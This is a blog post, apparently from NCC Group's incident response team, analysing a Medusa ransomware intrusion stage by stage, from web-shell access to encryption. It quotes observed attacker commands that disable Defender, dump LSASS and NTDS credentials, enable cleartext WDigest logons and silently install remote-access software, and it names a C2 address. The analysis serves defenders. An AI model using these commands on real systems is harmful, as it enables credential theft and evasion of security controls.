Unveiling the Dark Side: A Deep Dive into Active Ransomware Families 

Author: Molly Dewis 

Intro 

Our technical experts have written a blog series focused on Tactics, Techniques and Procedures (TTP’s) deployed by four ransomware families recently observed during NCC Group’s incident response engagements.   

In case you missed it, our last post analysed an Incident Response engagement involving the D0nut extortion group. In this instalment, we take a deeper dive into the Medusa. 

Not to be confused with MedusaLocker, Medusa was first observed in 2021, is a Ransomware-as-a-Service (RaaS) often using the double extortion method for monetary gain. In 2023 the groups’ activity increased with the launch of the ‘Medusa Blog’. This platform serves as a tool for leaking data belonging to victims. 

Summary 

This post will delve into a recent incident response engagement handled by NCC Group’s Cyber Incident Response Team (CIRT) involving Medusa Ransomware.  

Below provides a summary of findings which are presented in this blog post: 

• Use of web shells to maintain access. 
• Utilising PowerShell to conduct malicious activity. 
• Dumping password hashes.  
• Disabling antivirus services.  
• Use of Windows utilises for discovery activities.  
• Reverse tunnel for C2. 
• Data exfiltration.  
• Deployment of Medusa ransomware. 

Medusa  

Medusa ransomware is a variant that is believed to have been around since June 2021 [1]. Medusa is an example of a double-extortion ransomware where the threat actor exfiltrates and encrypts data. The threat actor threatens to release or sell the victim’s data on the dark web if the ransom is not paid. This means the group behind Medusa ransomware could be characterised as financially motivated. Victims of Medusa ransomware are from no particular industry suggesting the group behind this variant have no issue with harming any organisation.  

Incident Overview 

Initial access was gained by exploiting an external facing web server. Webshells were created on the server which gave the threat actor access to the environment. From initial access to the execution of the ransomware, a wide variety of activity was observed such as executing Base64 encoded PowerShell commands, dumping password hashes, and disabling antivirus services. Data was exfiltrated and later appeared on the Medusa leak site.  

Timeline 

T – Initial Access gained via web shells.  

T+13 days – Execution activity. 

T+16 days – Persistence activity. 

T+164 days – Defense Evasion activity. 

T+172 days – Persistence and Discovery activity. 

T+237 days – Defense Evasion and Credential Access Activity started. 

T+271 days – Ransomware Executed.  

Mitre TTPs 

Initial Access 

The threat actor gained initial access by exploiting a vulnerable application hosted by an externally facing web server. Webshells were deployed to gain a foothold in the victim’s environment and maintain access.  

Execution 

PowerShell was leveraged by the threat actor to conduct various malicious activity such as:   

• Downloading executables  
  • Example: powershell.exe -noninteractive -exec bypass powershell -exec bypass -enc … 
• Disabling Microsoft Defender 
  • Example: powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path ‘HKLM:\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender’ -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force; 
• Deleting executables 
  • Example: powershell.exe -noninteractive -exec bypass del C:\\PRogramdata\\re.exe 
• Conducting discovery activity  
  • Example: powershell.exe -noninteractive -exec bypass net group domain admins /domain 

Windows Management Instrumentation (WMI) was utilised to remotely execute a cmd.exe process: wmic /node:<IP ADDRESS> / user:<DOMAIN\\USER> /password:<REDACTED> process call create ‘cmd.exe’. 

Scheduled tasks were used to execute c:\\programdata\\a.bat. It is not known exactly what a.bat was used for, however, analysis of a compiled ASPX file revealed the threat actor had used PowerShell to install anydesk.msi.  

• powershell Invoke-WebRequest -Uri hxxp://download.anydesk[.]com/AnyDesk.msi -OutFile anydesk.msi 
• msiExec.exe /i anydesk.msi /qn 

A cmd.exe process was started with the following argument list: c:\\programdata\\a.bat’;start-sleep 15;ps AnyDeskMSI 

Various services were installed by the threat actor. PDQ Deploy was installed to deploy LAdHW.sys, a kernel driver which disabled antivirus services. Additionally, PSEXESVC.exe was installed on multiple servers. On one server, it was used to modify the firewall to allow WMI connections.   

Persistence 

Maintaining access to the victim’s network was achieved by creating a new user admin on the external facing web server (believed to be the initial access server). Additionally, on the two external facing web servers, web shells were uploaded to establish persistent access and execute commands remotely. JavaScript-based web shells were present on one web server and the GhostWebShell [2] was found on the other. The GhostWebShell is fileless however, its compiled versions were saved in C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\<APPLICATION NAME>\<HASH>\<HASH>. 

Defence Evasion 

Evading detection was one of the aims for this threat actor due to the various defence evasion techniques utilised. Antivirus agents were removed from all affected hosts including the antivirus server. Microsoft Windows Defender capabilities were disabled by the threat actor using: powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path ‘HKLM:\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender’ -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;.  

Additionally, LAdHW.sys, a signed kernel mode driver was installed as a new service to disable antivirus services. The following firewall rule was deleted: powershell.exe -Command amp; {Remove-NetFirewallRule -DisplayName \”<Antivirus Agent Firewall Rule Name>\”.  

The threat actor obfuscated their activity. Base64 encoded PowerShell commands were utilised to download malicious executables. It should be noted many of these executables such as JAVA64.exe and re.exe were deleted after use. Additionally, Sophos.exe (see below) which was packed with Themida, was executed.  

The value of HKLM\SYSTEM\ControlSet001\Control\SecurityProviders\WDigest\\UseLogonCredential was modified to 1 so that logon credentials were stored in cleartext. This enabled the threat actor to conduct credential dumping activities. 

Credential Access 

The following credential dumping techniques were utilised by the threat actor:  

• Using the Nishang payload to dump password hashes. Nishang is a collection of PowerShell scripts and payloads. The Get-PassHashes script, which requires admin privileges, was used.  
• Mimikatz was present on one of the external facing web servers, named as trust.exe. A file named m.txt was identified within C:\Users\admin\Desktop, the same location as the Mimikatz executable. 
• An LSASS memory dump was created using the built-in Windows tool, comsvcs.dll. 
  • powershell -exec bypass -c “rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ((ps lsass).id) C:\programdata\test.png full 
• he built-in Windows tool ntdsutil.exe was used to extract the NTDS:  
  • powershell ntdsutil.exe ‘ac i ntds’ ‘ifm’ ‘create full c:\programdata\nt’ q q 

Discovery 

The threat actor conducted the following discovery activity: 

Lateral Movement 

Remote Desktop Protocol (RDP) was employed to laterally move through the victim’s network. 

Command and Control 

A reverse tunnel allowed the threat actor to establish a new connection from a local host to a remote host. The binary c:\programdata\re.exe was executed and connected to 134.195.88[.]27 over port 80 (HTTP). Threat actors tend to use common protocols to blend in with legitimate traffic which can be seen in this case, as port 80 was used. 

Additionally, the JWrapper Remote Access application was installed on various servers to maintain access to the environment. AnyDesk was also utilised by the threat actor.  

Exfiltration 

Data was successfully exfiltrated by the threat actor. The victim’s data was later published to the Medusa leak site.  

Impact 

The Medusa ransomware in the form of gaze.exe, was deployed to the victim’s network. Files were encrypted, and .MEDUSA was appended to file names. The ransom note was named !!!READ_ME_MEDUSA!!!.txt. System recovery was inhibited due to the deletion of all VMs from the Hyper-V storage as well as local and cloud backups.  

Indicators of Compromise 

MITRE ATT CK® 

References 

[1] https://www.bleepingcomputer.com/news/security/medusa-ransomware-gang-picks-up-steam-as-it-targets-companies-worldwide/  

[2] https://www.mdsec.co.uk/2020/10/covert-web-shells-in-net-with-read-only-web-paths/ 

Here are some related articles you may find interesting

View articles by category

Call us before you need us.

Our experts will help you.

Get in touch